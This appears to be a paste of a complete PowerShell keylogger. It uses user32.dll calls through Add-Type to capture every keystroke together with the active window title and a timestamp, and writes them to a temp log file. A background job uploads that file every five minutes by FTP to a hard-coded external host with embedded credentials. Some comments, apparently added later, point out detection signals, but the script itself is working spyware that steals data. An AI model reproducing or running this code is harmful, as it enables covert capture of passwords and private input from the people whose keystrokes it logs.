
Untitled

a guest
Sep 18th, 2017
  1. <#
  2.  
  3. Tesseract - Kryptonian sceptre
  4. |-Botsec-|
  5.  
  6. #>
  7. function KeyLog {
       # Purpose (as written): poll every virtual-key code with GetAsyncKeyState,
       # translate pressed keys to characters with ToUnicode, and append each one,
       # together with the foreground window title and a timestamp, to
       # $env:temp\key.log. The outer loop is `while ($true)`, so this function
       # never returns.
       # Defender view: the user32.dll imports below are compiled at runtime by
       # Add-Type, so the DllImport text and the Win32Functions type names are part
       # of the script body and are recorded by PowerShell script block logging
       # (event 4104) when that logging is enabled.
  8.  
  9. # MapVirtualKeyMapTypes
  10. # <summary>
  11. # uCode is a virtual-key code and is translated into a scan code.
  12. # If it is a virtual-key code that does not distinguish between left- and
  13. # right-hand keys, the left-hand scan code is returned.
  14. # If there is no translation, the function returns 0.
  15. # </summary>
  16. $MAPVK_VK_TO_VSC = 0x00
  17.  
  18. # <summary>
  19. # uCode is a scan code and is translated into a virtual-key code that
  20. # does not distinguish between left- and right-hand keys. If there is no
  21. # translation, the function returns 0.
  22. # </summary>
  23. $MAPVK_VSC_TO_VK = 0x01
  24.  
  25. # <summary>
  26. # uCode is a virtual-key code and is translated into an unshifted
  27. # character value in the low-order word of the return value. Dead keys (diacritics)
  28. # are indicated by setting the top bit of the return value. If there is no
  29. # translation, the function returns 0.
  30. # </summary>
  31. $MAPVK_VK_TO_CHAR = 0x02
  32.  
  33. # <summary>
  34. # Windows NT/2000/XP: uCode is a scan code and is translated into a
  35. # virtual-key code that distinguishes between left- and right-hand keys. If
  36. # there is no translation, the function returns 0.
  37. # </summary>
  38. $MAPVK_VSC_TO_VK_EX = 0x03
  39.  
  40. # <summary>
  41. # Not currently documented
  42. # </summary>
  43. $MAPVK_VK_TO_VSC_EX = 0x04
  44.  
       # P/Invoke signatures (C# source held in here-strings). Each one is handed
       # to Add-Type below; together they cover key polling, keyboard state,
       # key-to-character translation and foreground-window lookup.
  45. $virtualkc_sig = @'
  46. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  47. public static extern short GetAsyncKeyState(int virtualKeyCode);
  48. '@
  49.  
  50. $kbstate_sig = @'
  51. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  52. public static extern int GetKeyboardState(byte[] keystate);
  53. '@
  54.  
  55. $mapchar_sig = @'
  56. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  57. public static extern int MapVirtualKey(uint uCode, int uMapType);
  58. '@
  59.  
  60. $tounicode_sig = @'
  61. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  62. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  63. '@
  64.  
  65. $foreground_sig = @'
  66. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  67. public static extern IntPtr GetForegroundWindow();
  68. '@
  69.  
       # Compile each signature into its own type under the Win32Functions
       # namespace; -passThru returns the type so its static method can be called.
       # The type names used here are fixed strings in this sample.
  70. $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
  71. $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  72. $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  73. $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
  74. $getForeground = Add-Type -MemberDefinition $foreground_sig -name "Win32MyGetForeground" -namespace Win32Functions -passThru
  75.  
       # Polling loop: wake every 40 ms and query virtual-key codes 1..254.
  76. while ($true) {
  77. Start-Sleep -Milliseconds 40
  78. $gotit = ""
  79.  
  80. for ($char = 1; $char -le 254; $char++) {
  81. $vkey = $char
  82. $gotit = $getKeyState::GetAsyncKeyState($vkey)
  83.  
       # -32767 is 0x8001 read as a signed short: the key is down (high bit) and
       # was pressed since the previous GetAsyncKeyState call (low bit).
  84. if ($gotit -eq -32767) {
  85.  
       # Re-query a fixed set of non-printing keys so they can be labelled in
       # the log line further down.
  86. $EnterKey = $getKeyState::GetAsyncKeyState(13)
  87. $TabKey = $getKeyState::GetAsyncKeyState(9)
  88. $DeleteKey = $getKeyState::GetAsyncKeyState(46)
  89. $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
  90. $LeftArrow = $getKeyState::GetAsyncKeyState(37)
  91. $UpArrow = $getKeyState::GetAsyncKeyState(38)
  92. $RightArrow = $getKeyState::GetAsyncKeyState(39)
  93. $DownArrow = $getKeyState::GetAsyncKeyState(40)
  94.  
  95. $caps_lock = [console]::CapsLock
  96.  
  97. $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
  98.  
  99. $kbstate = New-Object Byte[] 256
  100. $checkkbstate = $getKBState::GetKeyboardState($kbstate)
  101.  
       # Resolve the foreground window handle to a process MainWindowTitle, which
       # ties every logged key to the application that had focus.
  102. $TopWindow = $getForeground::GetForegroundWindow()
  103. $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
  104.  
  105. $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
  106.  
  107. $mychar = New-Object -TypeName "System.Text.StringBuilder";
  108. $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
  109.  
  110. $LogOutput += $mychar.ToString();
  111.  
  112. if ($EnterKey) {$LogOutput += '[ENTER]'}
  113. if ($TabKey) {$LogOutput += '[Tab]'}
  114. if ($DeleteKey) {$LogOutput += '[Delete]'}
  115. if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
  116. if ($LeftArrow) {$LogOutput += '[Left Arrow]'}
  117. if ($RightArrow) {$LogOutput += '[Right Arrow]'}
  118. if ($UpArrow) {$LogOutput += '[Up Arrow]'}
  119. if ($DownArrow) {$LogOutput += '[Down Arrow]'}
  120.  
  121. $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
  122. $LogOutput += "`t`t`t`t`t" + $TimeStamp
  123.  
       # A line is appended only when ToUnicode returned a positive count.
       # Host artifact: the log path is fixed at %TEMP%\key.log, and each line
       # has the shape "<window title>" <tabs> <text> <tabs> <timestamp>.
  124. if ($unicode_res -gt 0) {
  125. $logfile = "$env:temp\key.log"
  126. $LogOutput | Out-File -FilePath $logfile -Append
  127. }
  128. }
  129. }
  130. }
  131. }
  132.  
  133. Start-Job {
         # Background job: every $SleepTime (300) seconds, read $env:temp\key.log as
         # bytes and send it in an FTP upload request to the hard-coded $RemoteFile
         # host, authenticating with the hard-coded $Username/$Password below.
         # Defender view: FTP is unencrypted, so the credentials and the uploaded
         # bytes cross the network in cleartext; fixed-interval outbound FTP from a
         # PowerShell process is the network-side signal. The host name and the
         # account name in the Config block are indicators taken from this sample.
         # NOTE(review): the job is started before KeyLog is called on the last
         # line, presumably because KeyLog never returns; confirm when triaging
         # that both a job process and the foreground loop are present.
  134.  
  135. # Config
  136. $Username = "2452853_tesseract"
  137. $Password = "aid3n4life"
  138. $LocalFile = "$env:temp\key.log"
  139. $RemoteFile = "ftp://tesseract.royalwebhosting.net/"
  140. $SleepTime = 300
  141.  
  142. while (1 -eq 1)
  143. {
  144. # Sleep for specified time
  145. Start-Sleep -Seconds $SleepTime
  146.  
  147. # Create FTP Request Object
  148. $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
  149. $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
  150. $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
  151. $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
  152. $FTPRequest.UseBinary = $true
  153. $FTPRequest.UsePassive = $true
  154.  
  155. # Read the File for Upload
         # `gc -en byte` is Get-Content -Encoding Byte: the whole log is read into
         # memory as a byte array on every cycle.
  156. $FileContent = gc -en byte $LocalFile
  157. $FTPRequest.ContentLength = $FileContent.Length
  158.  
  159. # Get Stream Request by bytes
  160. $Run = $FTPRequest.GetRequestStream()
  161. $Run.Write($FileContent, 0, $FileContent.Length)
  162.  
  163. # Cleanup
  164. $Run.Close()
  165. $Run.Dispose()
  166. }
  167. }
  168.  
         # Start the capture loop in the calling session; it runs until the
         # hosting PowerShell process ends.
  169. KeyLog